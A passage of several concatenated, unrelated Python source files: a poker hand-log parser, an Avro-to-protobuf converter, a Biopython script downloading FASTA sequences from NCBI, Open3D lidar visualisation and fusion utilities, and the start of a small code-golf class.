    return Checks(line) if ' checks' in line else None
def _wins(line: str) -> Optional[Wins]:
    """Return a Wins event when a player collects the pot, else None."""
    return Wins(line) if ' collected ' in line else None
def _shows(line: str) -> Optional[Shows]:
    """Return a Shows event when a player reveals cards, else None."""
    return Shows(line) if ' shows a ' in line else None
def _quits(line: str) -> Optional[Quits]:
    """Return a Quits event when a player leaves the game, else None."""
    return Quits(line) if ' quits the game ' in line else None
def _flop(line: str) -> Optional[Flop]:
    """Return a Flop event when the flop is dealt, else None."""
    return Flop(line) if ('Flop: ' in line or 'flop' in line) else None
def _turn(line: str) -> Optional[Turn]:
    """Return a Turn event when the turn card is dealt, else None."""
    return Turn(line) if ('Turn: ' in line or 'turn: ' in line) else None
def _river(line: str) -> Optional[River]:
    """Return a River event when the river card is dealt, else None."""
    return River(line) if ('River: ' in line or 'river: ' in line) else None
def _undealt(line: str) -> Optional[Undealt]:
    """Return an Undealt event when undealt board cards are listed, else None."""
    return Undealt(line) if 'Undealt cards: ' in line else None
def _stand_up(line: str) -> Optional[StandsUp]:
    """Return a StandsUp event when a player stands up, else None."""
    return StandsUp(line) if ' stand up with ' in line else None
def _sit_in(line: str) -> Optional[SitsIn]:
    """Return a SitsIn event when a player sits back in, else None."""
    return SitsIn(line) if ' sit back with ' in line else None
def _player_stacks(line: str) -> Optional[PlayerStacks]:
    """Return a PlayerStacks event for the hand's stack summary line, else None."""
    return PlayerStacks(line) if 'Player stacks:' in line else None
def parser(lines: List[str], times: list, game_id: str) -> list:
    """This parses strings and converts to class objects.

    :param lines: Raw poker-log lines belonging to one hand.
    :param times: Timestamps parallel to ``lines`` (times[i] matches lines[i]).
    :param game_id: File name attached to every produced event.
    :returns: A list of LineAttributes subclasses, one per recognised line.
    """
    # Pre-scan: label every line with the street it occurs on, based on
    # which board cards have already been dealt.
    hand_position = []
    start_position = 'Pre Flop'
    for line in lines:
        if 'Flop:' in line or 'flop:' in line:
            start_position = 'Post Flop'
        if 'Turn:' in line or 'turn:' in line:
            start_position = 'Post Turn'
        if 'River:' in line or 'river:' in line:
            start_position = 'Post River'
        hand_position.append(start_position)
    # Pre-scan: hand number for this block of lines.
    curr_round = 0
    for line in lines:
        if 'starting hand' in line:
            curr_round = int(line.split('starting hand #')[1].split(' (')[0])
            break
    # Pre-scan: seat names, ids and chip counts from the "Player stacks:" line.
    player_name_lst, player_index_lst, player_value_lst = [], [], []
    for line in lines:
        if _player_stacks(line=line) is not None:
            for play in line.split('#')[1:]:
                player_name_lst.append(play.split('@')[0].split('"')[1].strip())
                player_index_lst.append(play.split('@')[1].split('"')[0].strip())
                player_value_lst.append(int(play.split('(')[1].split(')')[0]))
    check_players_name_lst = False
    if len(player_name_lst) > 0:
        # Chip counts keyed by player index: a fixed start-of-hand snapshot
        # and a running total updated as bets/wins are parsed.
        starting_chip_values = dict(zip(player_index_lst, player_value_lst))
        current_chip_values = dict(zip(player_index_lst, player_value_lst))
        check_players_name_lst = True
    start_time_val = times[0]
    end_time_val = times[-1]
    pot_size = 0
    lst = []
    previous_time = None
    # `pressor` tracks who made the last aggressive action and for how much.
    pressor = 'None'
    pressor_amount = 0
    players_left = player_index_lst
    # Main pass: convert each recognised line into its event object.
    for ind, line in enumerate(lines):
        line_time_val = times[ind]
        if ind >= 1:
            previous_time = times[ind - 1]
        # Seat request.
        if _request(line) is not None:
            new = Requests(line)
            new.game_id = game_id
            new.current_round = curr_round
            new.pot_size = pot_size
            new.time = line_time_val
            new.previous_time = previous_time
            new.start_time = start_time_val
            new.end_time = end_time_val
            if new.position is None:
                new.position = hand_position[ind]
            lst.append(new)
            continue
        # Seat approved by admin.
        if _approved(line) is not None:
            new = Approved(line)
            new.game_id = game_id
            new.current_round = curr_round
            new.pot_size = pot_size
            new.time = line_time_val
            new.previous_time = previous_time
            new.start_time = start_time_val
            new.end_time = end_time_val
            if new.position is None:
                new.position = hand_position[ind]
            lst.append(new)
            continue
        # Player joined the table.
        if _joined(line) is not None:
            new = Joined(line)
            new.game_id = game_id
            new.current_round = curr_round
            new.pot_size = pot_size
            new.time = line_time_val
            new.previous_time = previous_time
            new.start_time = start_time_val
            new.end_time = end_time_val
            if new.position is None:
                new.position = hand_position[ind]
            lst.append(new)
            continue
        # Player stands up: remove them from the remaining-player list.
        if _stand_up(line) is not None:
            new = StandsUp(line)
            new.game_id = game_id
            new.current_round = curr_round
            new.pot_size = pot_size
            new.time = line_time_val
            new.previous_time = previous_time
            players_left = [player for player in players_left if player != new.player_index]
            new.remaining_players = players_left
            new.start_time = start_time_val
            new.end_time = end_time_val
            if check_players_name_lst is True:
                new.starting_chips = starting_chip_values[new.player_index]
                new.current_chips = current_chip_values[new.player_index]
            if new.position is None:
                new.position = hand_position[ind]
            lst.append(new)
            continue
        # Player sits back in; their parsed stack becomes their chip counts.
        if _sit_in(line) is not None:
            new = SitsIn(line)
            new.game_id = game_id
            new.current_round = curr_round
            new.pot_size = pot_size
            new.time = line_time_val
            new.previous_time = previous_time
            new.start_time = start_time_val
            new.end_time = end_time_val
            if check_players_name_lst is True:
                new.starting_chips = new.stack
                new.current_chips = new.stack
            if new.position is None:
                new.position = hand_position[ind]
            lst.append(new)
            continue
        # The user's own hole cards.
        # NOTE(review): unlike the other branches this one never sets
        # start_time/end_time or remaining_players — confirm intentional.
        if _my_cards(line) is not None:
            new = MyCards(line)
            new.game_id = game_id
            new.current_round = curr_round
            new.pot_size = pot_size
            new.time = line_time_val
            new.previous_time = previous_time
            if new.cards is None:
                new_cards = line.split(' hand is ')[1].split(',')
                new.cards = tuple([i.strip() for i in new_cards])
            if new.position is None:
                new.position = hand_position[ind]
            lst.append(new)
            continue
        # Small blind posted: money enters the pot and the blind becomes
        # the current pressor.
        if _small_blind(line) is not None:
            new = SmallBlind(line)
            new.game_id = game_id
            new.current_round = curr_round
            new.time = line_time_val
            new.previous_time = previous_time
            new.action_amount = pressor_amount
            new.remaining_players = players_left
            new.start_time = start_time_val
            new.end_time = end_time_val
            if new.stack is None:
                new.stack = int(line.split('of ')[1])
            pot_size += new.stack
            new.pot_size = pot_size
            pressor = new.player_index
            pressor_amount = new.stack
            if check_players_name_lst is True:
                current_chip_values[new.player_index] -= new.stack
                new.current_chips = current_chip_values[new.player_index]
                new.starting_chips = starting_chip_values[new.player_index]
            if new.position is None:
                new.position = hand_position[ind]
            lst.append(new)
            continue
        # Big blind posted; records the small blind as the prior action.
        if _big_blind(line) is not None:
            new = BigBlind(line)
            new.game_id = game_id
            new.current_round = curr_round
            new.time = line_time_val
            new.previous_time = previous_time
            new.action_from_player = pressor
            new.action_amount = pressor_amount
            new.remaining_players = players_left
            new.start_time = start_time_val
            new.end_time = end_time_val
            if new.stack is None:
                new.stack = int(line.split('of ')[1])
            pot_size += new.stack
            new.pot_size = pot_size
            pressor = new.player_index
            pressor_amount = new.stack
            if check_players_name_lst is True:
                current_chip_values[new.player_index] -= new.stack
                new.current_chips = current_chip_values[new.player_index]
                new.starting_chips = starting_chip_values[new.player_index]
            if new.position is None:
                new.position = hand_position[ind]
            lst.append(new)
            continue
        # Fold: the player leaves the remaining-player list.
        if _folds(line) is not None:
            new = Folds(line)
            new.game_id = game_id
            new.current_round = curr_round
            new.pot_size = pot_size
            new.time = line_time_val
            new.previous_time = previous_time
            new.action_from_player = pressor
            new.action_amount = pressor_amount
            players_left = [player for player in players_left if player != new.player_index]
            new.remaining_players = players_left
            new.start_time = start_time_val
            new.end_time = end_time_val
            if check_players_name_lst is True:
                new.current_chips = current_chip_values[new.player_index]
                new.starting_chips = starting_chip_values[new.player_index]
            if new.position is None:
                new.position = hand_position[ind]
            lst.append(new)
            continue
        # Call: amount may carry an " and ..." suffix (e.g. all-in wording).
        if _calls(line) is not None:
            new = Calls(line)
            new.game_id = game_id
            new.current_round = curr_round
            new.time = line_time_val
            new.previous_time = previous_time
            new.remaining_players = players_left
            new.start_time = start_time_val
            new.end_time = end_time_val
            if new.stack is None:
                new_stack = line.split(' calls ')[1]
                if ' and ' in new_stack:
                    new_stack = int(new_stack.split(' and ')[0])
                else:
                    new_stack = int(new_stack)
                new.stack = new_stack
            pot_size += new.stack
            new.pot_size = pot_size
            new.action_from_player = pressor
            new.action_amount = pressor_amount
            if check_players_name_lst is True:
                current_chip_values[new.player_index] -= new.stack
                new.current_chips = current_chip_values[new.player_index]
                new.starting_chips = starting_chip_values[new.player_index]
            if new.position is None:
                new.position = hand_position[ind]
            lst.append(new)
            continue
        # Bet or raise: an " and " suffix marks an all-in.
        if _raises(line) is not None:
            new = Raises(line)
            new.game_id = game_id
            new.current_round = curr_round
            new.time = line_time_val
            new.previous_time = previous_time
            new.remaining_players = players_left
            new.start_time = start_time_val
            new.end_time = end_time_val
            if new.stack is None:
                new_stack = 0
                if ' bets ' in line:
                    new_stack = line.split(' bets ')[1]
                if ' raises to ' in line:
                    new_stack = line.split(' raises to ')[1]
                if ' and ' in line:
                    new_stack = new_stack.split(' and ')[0]
                    new.all_in = True
                new.stack = int(new_stack)
            pot_size += new.stack
            new.pot_size = pot_size
            new.action_from_player = pressor
            new.action_amount = pressor_amount
            pressor = new.player_index
            pressor_amount = new.stack
            if check_players_name_lst is True:
                current_chip_values[new.player_index] -= new.stack
                new.current_chips = current_chip_values[new.player_index]
                new.starting_chips = starting_chip_values[new.player_index]
            if new.position is None:
                new.position = hand_position[ind]
            lst.append(new)
            continue
        # Check: no chips move.
        if _checks(line) is not None:
            new = Checks(line)
            new.game_id = game_id
            new.current_round = curr_round
            new.pot_size = pot_size
            new.time = line_time_val
            new.previous_time = previous_time
            new.action_from_player = pressor
            new.remaining_players = players_left
            new.start_time = start_time_val
            new.end_time = end_time_val
            if check_players_name_lst is True:
                new.current_chips = current_chip_values[new.player_index]
                new.starting_chips = starting_chip_values[new.player_index]
            if new.position is None:
                new.position = hand_position[ind]
            lst.append(new)
            continue
        # Pot collected: parse the amount, the winning hand description and
        # (when shown) the winning card combination.
        if _wins(line) is not None:
            new = Wins(line)
            new.game_id = game_id
            new.current_round = curr_round
            new.pot_size = pot_size
            new.time = line_time_val
            new.previous_time = previous_time
            new.remaining_players = players_left
            new.start_time = start_time_val
            new.end_time = end_time_val
            if new.stack is None:
                new.stack = int(line.split(' collected ')[1].split(' from ')[0])
            if new.winning_hand is None:
                if ' from pot with ' in line:
                    if ', ' in line.split(' from pot with ')[1].split(' (')[0]:
                        new.winning_hand = line.split(' from pot with ')[1].split(', ')[0]
                    else:
                        new.winning_hand = line.split(' from pot with ')[1].split(' (')[0]
            if new.cards is None:
                if 'combination' in line:
                    new_cards = line.split(': ')[1].split(')')[0].split(',')
                    new.cards = tuple([i.strip() for i in new_cards])
            if new.position is None:
                new.position = hand_position[ind]
            if check_players_name_lst is True:
                current_chip_values[new.player_index] += new.stack
                new.current_chips = current_chip_values[new.player_index]
                new.starting_chips = starting_chip_values[new.player_index]
            lst.append(new)
            continue
        # Showdown reveal.
        if _shows(line) is not None:
            new = Shows(line)
            new.game_id = game_id
            new.current_round = curr_round
            new.pot_size = pot_size
            new.time = line_time_val
            new.previous_time = previous_time
            new.start_time = start_time_val
            new.end_time = end_time_val
            new.remaining_players = players_left
            if check_players_name_lst is True:
                new.current_chips = current_chip_values[new.player_index]
                new.starting_chips = starting_chip_values[new.player_index]
            if new.cards is None:
                new_cards = line.split(' shows a ')[1].split('.')[0].split(',')
                new.cards = [i.strip() for i in new_cards]
            if new.position is None:
                new.position = hand_position[ind]
            lst.append(new)
            continue
        # Player quits; guard the chip lookup because the player may never
        # have appeared in the stacks line.
        if _quits(line) is not None:
            new = Quits(line)
            new.game_id = game_id
            new.current_round = curr_round
            new.pot_size = pot_size
            new.time = line_time_val
            new.previous_time = previous_time
            players_left = [player for player in players_left if player != new.player_index]
            new.remaining_players = players_left
            new.start_time = start_time_val
            new.end_time = end_time_val
            if check_players_name_lst is True:
                if new.player_index in starting_chip_values:
                    new.current_chips = current_chip_values[new.player_index]
                    new.starting_chips = starting_chip_values[new.player_index]
            if new.position is None:
                new.position = hand_position[ind]
            lst.append(new)
            continue
        # Flop dealt: a new betting street resets the pressor.
        if _flop(line) is not None:
            pressor = 'None'
            pressor_amount = 0
            new = Flop(line)
            new.game_id = game_id
            new.current_round = curr_round
            new.pot_size = pot_size
            new.time = line_time_val
            new.previous_time = previous_time
            new.action_from_player = pressor
            new.action_amount = pressor_amount
            new.remaining_players = players_left
            new.start_time = start_time_val
            new.end_time = end_time_val
            if new.cards is None:
                new_cards = line.split(' [')[1].split(']')[0].split(',')
                new.cards = [i.strip() for i in new_cards]
            if new.position is None:
                new.position = 'Flop'
            lst.append(new)
            continue
        # Turn dealt: new street, pressor resets.
        if _turn(line) is not None:
            pressor = 'None'
            pressor_amount = 0
            new = Turn(line)
            new.game_id = game_id
            new.current_round = curr_round
            new.pot_size = pot_size
            new.time = line_time_val
            new.previous_time = previous_time
            new.action_from_player = pressor
            new.action_amount = pressor_amount
            new.remaining_players = players_left
            new.start_time = start_time_val
            new.end_time = end_time_val
            if new.cards is None:
                new.cards = line.split(' [')[1].split(']')[0].strip()
            if new.position is None:
                new.position = 'Turn'
            lst.append(new)
            continue
        # River dealt: new street, pressor resets.
        if _river(line) is not None:
            pressor = 'None'
            pressor_amount = 0
            new = River(line)
            new.game_id = game_id
            new.current_round = curr_round
            new.pot_size = pot_size
            new.time = line_time_val
            new.previous_time = previous_time
            new.action_from_player = pressor
            new.action_amount = pressor_amount
            new.remaining_players = players_left
            new.start_time = start_time_val
            new.end_time = end_time_val
            if new.cards is None:
                new.cards = line.split(' [')[1].split(']')[0].strip()
            if new.position is None:
                new.position = 'River'
            lst.append(new)
            continue
        # Undealt board cards: the card count tells which street was reached.
        if _undealt(line) is not None:
            pressor = 'None'
            pressor_amount = 0
            new = Undealt(line)
            new.game_id = game_id
            new.current_round = curr_round
            new.pot_size = pot_size
            new.time = line_time_val
            new.start_time = start_time_val
            new.end_time = end_time_val
            new.previous_time = previous_time
            new.action_from_player = pressor
            new.action_amount = pressor_amount
            new.remaining_players = players_left
            if new.cards is None:
                new_cards = line.split(' [')[1].split(']')[0].split(',')
                new.cards = [i.strip() for i in new_cards]
            if new.position is None:
                if len(new.cards) == 1:
                    new.position = 'Post Turn'
                elif len(new.cards) == 2:
                    new.position = 'Post Flop'
            lst.append(new)
            continue
        # Start-of-hand stack summary; carries the full seat/chip lists.
        if _player_stacks(line) is not None:
            new = PlayerStacks(line)
            new.game_id = game_id
            new.current_round = curr_round
            new.pot_size = pot_size
            new.time = line_time_val
            new.previous_time = previous_time
            new.player_name = player_name_lst
            new.player_index = player_index_lst
            new.remaining_players = players_left
            new.start_time = start_time_val
            new.end_time = end_time_val
            new.stack = 0
            if check_players_name_lst is True:
                new.current_chips = player_value_lst
                new.starting_chips = player_value_lst
            if new.position is None:
                new.position = hand_position[ind]
            lst.append(new)
            continue
    return lst
# Every line-event class produced by parser(), for consumers that need the
# full set of event types.
class_object_lst = [Requests, Approved, Joined, MyCards, SmallBlind, BigBlind, Folds, Calls, Raises, Checks, Wins,
                    Shows, Quits, Flop, Turn, River, Undealt, StandsUp, SitsIn, PlayerStacks]
|
import json
import re
from ..meta import ProtocolMeta
class Avro(ProtocolMeta):
    """Reader for an Avro record list that can render it as a protobuf schema."""

    # Avro primitive type name -> protobuf scalar type.
    # NOTE(review): 'null' maps to None, which would render literally as the
    # text "None" in a generated field line — confirm whether null-typed
    # fields ever occur in practice.
    PRIMITIVES = {
        'null': None,
        'boolean': 'bool',
        'int': 'sint32',
        'long': 'sint64',
        'float': 'float',
        'double': 'double',
        'bytes': 'bytes',
        'string': 'string',
    }

    def __init__(self, filepath):
        super(Avro, self).__init__(filepath)

    def to_protobuf(self, indent=4, syntax='proto3'):
        """Render the Avro records stored in ``self._filepath`` as protobuf text.

        Args:
            indent (int): number of spaces used to indent field lines.
            syntax (str): protobuf syntax label; a ``protoN`` string is
                reduced to its numeric part before comparison.

        Returns:
            str: the generated protobuf schema.
        """
        lines = ''
        with open(self._filepath) as fp:
            # json.load reads straight from the file object instead of
            # materializing the whole file as a string first.
            records = json.load(fp)
        match = re.match(r'^proto(\d+)$', syntax)
        if match:
            syntax = match.group(1)
        # If protocol buffers syntax is greater than or equal to v3,
        # then include the `syntax` statement at the beginning of
        # the file.
        if int(syntax) >= 3:
            lines += 'syntax = "proto{}";\n'.format(syntax)
            lines += '\n'
        first = 0
        last = len(records) - 1
        for i in range(len(records)):
            # blank line between messages, but not before the first one
            lines += '\n' if i != first else ''
            lines += 'message {}'.format(records[i]['name'])
            lines += ' {\n'
            fields = records[i]['fields']
            for j in range(len(fields)):
                # protobuf field numbers start at 1
                lines += ' ' * indent + '{} {} = {};\n'.format(
                    self.PRIMITIVES[fields[j]['type']],
                    fields[j]['name'],
                    j + 1,
                )
            # no trailing newline after the final closing brace
            lines += '}\n' if i != last else '}'
        return lines
|
'''
||| ||| ||||||||| ||| |||
||| ||| ||| ||| ||| |||
|||||||||| ||| ||| || ||
|||||||||| ||| ||| ||| || |||
||| ||| ||| ||| ||||||||||||
||| ||| ||||||||| ||| |||
||||||||||| |||||||||
||| ||| |||
||| ||| |||
||| ||| |||
||| ||| |||
||| |||||||||
||||||||||| ||| ||| |||| |||
||| ||| ||| ||| ||| || |||
||||||||||| ||| ||| ||| || |||
||| ||| ||| ||| ||| || |||
||| ||| ||| ||| ||| |||||
||| ||| ||||||||||| ||| ||||
Example:
./DownoloadFastas.py -I ./ENA.txt -O "./SCOPeFastas/" -E [email protected]
|||||||||| |||||||||| ||| ||| ||| ||| ||| ||||||||||
||| ||| ||| ||| ||| ||| ||||| ||||| |||
||| ||| ||| ||| ||| ||| ||| || || ||| ||||||||||
||| ||| ||| ||| ||| ||| ||| ||| ||| ||||||||||
||| ||| ||| ||| ||| ||| ||| ||| |||
|||||||||| |||||||||| ||||||||| |||||||||| ||| ||| ||||||||||
ENA File Columns
·· 01 ·· Test (UniProt Entry)
·· 02 ·· SCOPe Name
·· 03 ·· SCOPe Id
·· 04 ·· Blasth
·· 05 ·· V3
·· 06 ·· V4
·· 07 ·· V5
·· 08 ·· V6
·· 09 ·· V7
·· 10 ·· V8
·· 11 ·· V9
·· 12 ·· V10
·· 13 ·· V11
·· 14 ·· V12
·· 15 ·· Entry.name
·· 16 ·· Status
·· 17 ·· Protein.names
·· 18 ·· Gene.names
·· 19 ·· Organism
·· 20 ·· Length
·· 21 ·· Gene.names...ordered.locus..
·· 22 ·· Pathway
·· 23 ·· DNA.binding
·· 24 ·· Gene.ontology.GO.
·· 25 ·· Sequence.similarities
·· 26 ·· Cross.reference..Pfam.
·· 27 ·· Cross.reference..PANTHER.
·· 28 ·· Cross.reference..Reactome.
·· 29 ·· Cross.reference..UniPathway
·· 30 ·· Cross.reference..BioCyc
·· 31 ·· Ensembl.transcript
·· 32 ·· Cross.reference..KEGG.
·· 33 ·· Cross.reference..PATRIC.
·· 34 ·· EnsemblBacteria.transcript
·· 35 ·· Cross.reference..STRING.
·· 36 ·· Gene.ontology.IDs
·· 37 ·· Cross.reference..eggNOG.
·· 38 ·· Cross.reference..OrthoDB.
·· 39 ·· Gene.names...ORF..
·· 40 ·· Gene.names...primary..
·· 41 ·· Sequence
·· 42 ·· Function..CC.
·· 43 ·· Activity.regulation
·· 44 ·· Gene.names...synonym..
·· 45 ·· Organism.ID
·· 46 ·· Annotation
·· 47 ·· EnsemblPlants.transcript
·· 48 ·· Cross.reference..RefSeq
·· 49 ·· Cross.reference..PlantReactome.
·· 50 ·· Cross.reference.GeneID
·· 51 ·· Cross.reference..EMBL.
'''
#··················································································#
#··················································································#
# Modules #
#··················································································#
#··················································································#
import argparse

import Bio
from Bio import Entrez
from Bio import SeqIO
#··················································································#
#··················································································#
# Arguments #
#··················································································#
#··················································································#
# Command-line arguments: input ENA table, output folder, and the e-mail
# address NCBI Entrez requires to identify the client.
parser = argparse.ArgumentParser()
parser.add_argument("-I", "--InputFilePath", help="Path to the file that contains the ENA proteins data")
parser.add_argument("-O", "--OutputFolder", help="Path to the folder that will contains the resulting files")
parser.add_argument("-E", "--Email", help="E-mail address used to identify this client to NCBI Entrez")
args = parser.parse_args()
# Get the content of the arguments
filepath = args.InputFilePath
# Fixed: the output folder was previously bound to `PathMinMax` while the
# code below referenced an undefined `fastasDir`, causing a NameError.
fastasDir = args.OutputFolder
mail = args.Email
#··················································································#
#··················································································#
#                                    Main Code                                     #
#··················································································#
#··················································································#
# Log in to Entrez
Entrez.email = mail
first = 1
# open file
with open(filepath, "r") as file:
    for line in file:
        # ignore first line (column headers)
        if first == 1:
            first = 0
            continue
        # get the columns elements in the list
        line = line.replace("\n", "").split("\t")
        # extract elements (see the module docstring for the column layout)
        geneName = line[17]
        Organism = line[18].split(" (")[0]
        scope = line[1]
        protein = line[16]
        entry = line[0]
        idEMBL = line[50].split(";")
        # a trailing ';' leaves an empty id behind — drop it if present
        # (guarded: .remove('') raises ValueError when no empty entry exists)
        if '' in idEMBL:
            idEMBL.remove('')
        # header of the file that contains the protein data
        header = ">{}\t{}\t{}\t{}\n".format(entry, geneName, Organism, protein)
        # loop through the ids on EMBL
        for count, element in enumerate(idEMBL):
            # if the script can access the id, write the sequence to a new file
            try:
                handle = Entrez.efetch(db="nucleotide", id=element, rettype="gb", retmode="text")
                record = SeqIO.read(handle, "genbank")
                handle.close()
                sequence = str(record.seq)
                newpath = "{}{}({}).fasta".format(fastasDir, scope, count)
                # open the new file and write the data
                with open(newpath, "w") as newfile:
                    newfile.write(header)
                    # wrap the sequence: newline after every 70th character
                    for num, char in enumerate(sequence):
                        newfile.write(char)
                        if (num % 69 == 0) and (num != 0):
                            newfile.write("\n")
            # if we cannot access the id, skip it and continue with the next one
            # (narrowed from a bare `except:` which also swallowed KeyboardInterrupt)
            except Exception:
                continue
print("Archivos fasta descargados exitosamente")
|
# -*- coding: utf-8 -*-
"""
Utility functions for 3d lidar visualization and processing by utilizing open3d.
"""
# Author: CARLA Team, Runsheng Xu <[email protected]>
# License: MIT
import time
import open3d as o3d
import numpy as np
from matplotlib import cm
from scipy.stats import mode
import opencda.core.sensing.perception.sensor_transformation as st
from opencda.core.sensing.perception.obstacle_vehicle import is_vehicle_cococlass, ObstacleVehicle, StaticObstacle
# Colour ramp used to map lidar intensity onto RGB.
# NOTE(review): the constant is named VIRIDIS but loads the 'plasma'
# colormap — confirm which palette is intended.
VIRIDIS = np.array(cm.get_cmap('plasma').colors)
# Evenly spaced sample positions matching the colormap entries; used as
# the x-coordinates for np.interp when colouring points by intensity.
VID_RANGE = np.linspace(0.0, 1.0, VIRIDIS.shape[0])
# Semantic-segmentation palette; the list index corresponds to the label id.
LABEL_COLORS = np.array([
    (255, 255, 255), # None
    (70, 70, 70),    # Building
    (100, 40, 40),   # Fences
    (55, 90, 80),    # Other
    (220, 20, 60),   # Pedestrian
    (153, 153, 153), # Pole
    (157, 234, 50),  # RoadLines
    (128, 64, 128),  # Road
    (244, 35, 232),  # Sidewalk
    (107, 142, 35),  # Vegetation
    (0, 0, 142),     # Vehicle
    (102, 102, 156), # Wall
    (220, 220, 0),   # TrafficSign
    (70, 130, 180),  # Sky
    (81, 0, 81),     # Ground
    (150, 100, 100), # Bridge
    (230, 150, 140), # RailTrack
    (180, 165, 180), # GuardRail
    (250, 170, 30),  # TrafficLight
    (110, 190, 160), # Static
    (170, 120, 50),  # Dynamic
    (45, 60, 150),   # Water
    (145, 170, 100), # Terrain
]) / 255.0  # normalize each channel to [0-1] since that is what Open3D uses
def o3d_pointcloud_encode(raw_data, point_cloud):
    """
    Encode the raw point cloud to Open3d PointCloud object.

    Maps lidar intensity onto the colour ramp and flips the x axis so the
    rendered cloud matches Unreal's coordinate handedness.

    Args:
        -raw_data (np.ndarray): Raw lidar points (N, (x, y, z, i)) obtained from lidar sensor.
        -point_cloud (o3d.PointCloud): Open3d PointCloud, updated in place.

    Note:
        ``points`` below is a *view* into ``raw_data``, so negating its first
        column mutates the caller's array as a side effect — confirm callers
        do not reuse ``raw_data`` afterwards.
    """
    # Isolate the intensity and compute a color for it
    intensity = raw_data[:, -1]
    intensity_col = 1.0 - np.log(intensity) / np.log(np.exp(-0.004 * 100))
    int_color = np.c_[
        np.interp(intensity_col, VID_RANGE, VIRIDIS[:, 0]),
        np.interp(intensity_col, VID_RANGE, VIRIDIS[:, 1]),
        np.interp(intensity_col, VID_RANGE, VIRIDIS[:, 2])]
    # Isolate the 3D data
    points = raw_data[:, :-1]
    # We're negating the y to correctly visualize a world that matches
    # what we see in Unreal since Open3D uses a right-handed coordinate system
    # NOTE(review): the comment above says "y" but the slice [:, :1] negates
    # the *first* (x) column — confirm which axis is intended.
    points[:, :1] = -points[:, :1]
    point_cloud.points = o3d.utility.Vector3dVector(points)
    point_cloud.colors = o3d.utility.Vector3dVector(int_color)
def o3d_visualizer_init(actor_id):
    """
    Create and configure an Open3D visualizer window for one vehicle.

    Args:
        -actor_id (int): Vehicle's id, used as the window title.

    Returns:
        -vis (o3d.visualization.Visualizer): the configured visualizer.
    """
    visualizer = o3d.visualization.Visualizer()
    visualizer.create_window(window_name=str(actor_id),
                             width=480,
                             height=320,
                             left=480,
                             top=270)
    render_opt = visualizer.get_render_option()
    render_opt.background_color = [0.05, 0.05, 0.05]
    render_opt.point_size = 1
    render_opt.show_coordinate_frame = True
    return visualizer
def o3d_visualizer_show(vis, count, point_cloud, objects):
    """
    Render one frame: refresh the point cloud, overlay the vehicle bounding
    boxes, then remove them again so the next frame starts clean.

    Args:
        -vis (o3d.Visualizer): Visualization interface.
        -count (int): current step since simulation started.
        -point_cloud (o3d.PointCLoud): Open3d point clouds.
        -objects (dict): The dictionary containing objects.
    """
    # the geometry is registered exactly once, on the second frame
    if count == 2:
        vis.add_geometry(point_cloud)
    vis.update_geometry(point_cloud)

    # only vehicle detections are drawn for now
    vehicle_boxes = [detected.o3d_bbx
                     for key, object_list in objects.items()
                     if key == 'vehicles'
                     for detected in object_list]

    for box in vehicle_boxes:
        vis.add_geometry(box)

    vis.poll_events()
    vis.update_renderer()
    # small sleep mitigates Open3D window jitter
    time.sleep(0.001)

    for box in vehicle_boxes:
        vis.remove_geometry(box)
def o3d_camera_lidar_fusion(objects, yolo_bbx, lidar_3d, projected_lidar, lidar_sensor):
    """
    Utilize the 3D lidar points to extend the 2D bounding box from camera to 3D bounding box under world coordinates.

    Args:
        -objects (dict): The dictionary contains all object detection result.
        -yolo_bbx (torch.Tensor): Object detection bounding box at current photo from yolov5,
         shape:(n, [x1, y1, x2, y2, label]).
        -lidar_3d (np.ndarray): Raw 3D lidar points in lidar coordinate system.
        -projected_lidar (np.ndarray): 3D lidar points projected to the camera space.
        -lidar_sensor (carla.Sensor): The lidar sensor.

    Returns:
        -objects (dict): The update object dictionary that contains 3d bounding boxes.
    """
    # convert torch tensor to numpy array first
    if yolo_bbx.is_cuda:
        yolo_bbx = yolo_bbx.cpu().detach().numpy()
    else:
        yolo_bbx = yolo_bbx.detach().numpy()

    for i in range(yolo_bbx.shape[0]):
        detection = yolo_bbx[i]
        # 2d bbx coordinates
        x1, y1, x2, y2 = int(detection[0]), int(detection[1]), int(detection[2]), int(detection[3])
        label = int(detection[5])

        # choose the lidar points in the 2d yolo bounding box
        points_in_bbx = \
            (projected_lidar[:, 0] > x1) & (projected_lidar[:, 0] < x2) & \
            (projected_lidar[:, 1] > y1) & (projected_lidar[:, 1] < y2) & \
            (projected_lidar[:, 2] > 0.0)
        # ignore intensity channel
        select_points = lidar_3d[points_in_bbx][:, :-1]
        if select_points.shape[0] == 0:
            continue

        # filter out the outliers: keep only points whose |x| and |y| fall
        # within +/-3 of the most common integer magnitude.
        # Fixed: `np.int` was removed in NumPy 1.24 — use the builtin `int`.
        x_common = mode(np.array(np.abs(select_points[:, 0]), dtype=int), axis=0)[0][0]
        y_common = mode(np.array(np.abs(select_points[:, 1]), dtype=int), axis=0)[0][0]
        # NOTE(review): SciPy >= 1.11 makes `mode` return scalars by default
        # (keepdims=False); the [0][0] indexing above assumes the older
        # array-returning behaviour — confirm the pinned SciPy version.
        points_inlier = (np.abs(select_points[:, 0]) > x_common - 3) & (np.abs(select_points[:, 0]) < x_common + 3) & \
                        (np.abs(select_points[:, 1]) > y_common - 3) & (np.abs(select_points[:, 1]) < y_common + 3)
        select_points = select_points[points_inlier]
        if select_points.shape[0] < 2:
            continue

        # to visualize 3d lidar points in o3d visualizer, we need to revert the x coordinates
        select_points[:, :1] = -select_points[:, :1]

        # create o3d.PointCloud object
        o3d_pointcloud = o3d.geometry.PointCloud()
        o3d_pointcloud.points = o3d.utility.Vector3dVector(select_points)
        # add o3d bounding box
        aabb = o3d_pointcloud.get_axis_aligned_bounding_box()
        aabb.color = (0, 1, 0)

        # get the eight corners of the bounding box
        corner = np.asarray(aabb.get_box_points())
        # convert back to unreal coordinate
        corner[:, :1] = -corner[:, :1]
        corner = corner.transpose()
        # extend (3, 8) to (4, 8) for homogenous transformation
        corner = np.r_[corner, [np.ones(corner.shape[1])]]
        # project to world reference
        corner = st.sensor_to_world(corner, lidar_sensor.get_transform())
        corner = corner.transpose()[:, :3]

        if is_vehicle_cococlass(label):
            # group vehicle detections under the 'vehicles' key
            objects.setdefault('vehicles', []).append(ObstacleVehicle(corner, aabb))
        else:
            # any other obstacle class is treated as static
            objects.setdefault('static', []).append(StaticObstacle(corner, aabb))
    return objects
|
#!/usr/bin/env python3
# encoding: utf-8
# based on someone elses soln
class Goal(int):
    """An int subclass: call with no args to add an 'o', with a suffix to spell."""

    def __call__(self, x=None):
        # With an argument, spell 'g' + as many 'o's as our value + the suffix.
        if x is not None:
            return f'g{"o" * self}{x}'
        # Without one, produce the next Goal in the chain.
        return type(self)(self + 1)
g = Goal()
def main():
